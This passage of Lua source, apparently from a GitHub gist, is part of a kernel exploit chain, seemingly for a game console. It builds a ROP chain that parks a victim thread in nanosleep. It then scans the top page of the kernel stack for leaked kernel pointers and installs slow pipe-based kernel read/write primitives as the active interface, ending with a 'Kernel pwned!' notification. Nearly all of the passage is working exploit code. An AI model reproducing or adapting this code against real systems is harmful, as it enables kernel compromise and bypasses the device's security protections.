	local collected = {}
	local scan_size = 0x1000
	-- Victim-side chain: block in nanosleep, then run the caller's extras.
	local fill_victim_rop = function(rop)
		rop:push_syscall_noret("nanosleep", estate.timeout_addr, 0)
		if type(rop_cb) == "function" then
			rop_cb(rop)
		end
	end
	-- Main-thread body: scan the top page of the kernel stack each poll.
	local scan_kstack = function(rop, stack_addr, stack_size)
		local page_addr = stack_addr + (stack_size - scan_size)
		local page_buf = memory.read_buffer(page_addr, scan_size)
		--dbgf("scanning kernel at %s stack of size 0x%x", page_addr, scan_size)
		if dump_kstack then
			logf("kernel stack:\n%s\n", hexdump(page_buf))
		end
		local kptrs, num_kptrs = scan_buffer_for_kptrs(page_buf)
		if num_kptrs > 0 and dump_ptrs then
			logf("kernel pointers in kernel stack:");
			logf(inspect(kptrs))
		end
		table.merge(collected, kptrs)
	end
	kern_exec(rop, fill_victim_rop, scan_kstack)
	return collected
end
-- Install the slow pipe-based primitives as the active kernel R/W interface.
kern_read = kern_read_slow
kern_write = kern_write_slow
-- Report success to the user with an on-screen notification.
send_notification_text(main_rop, 0, {
	type = globals.NOTIFICATION_TYPE_REQUEST,
	message = "Kernel pwned!"
})
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment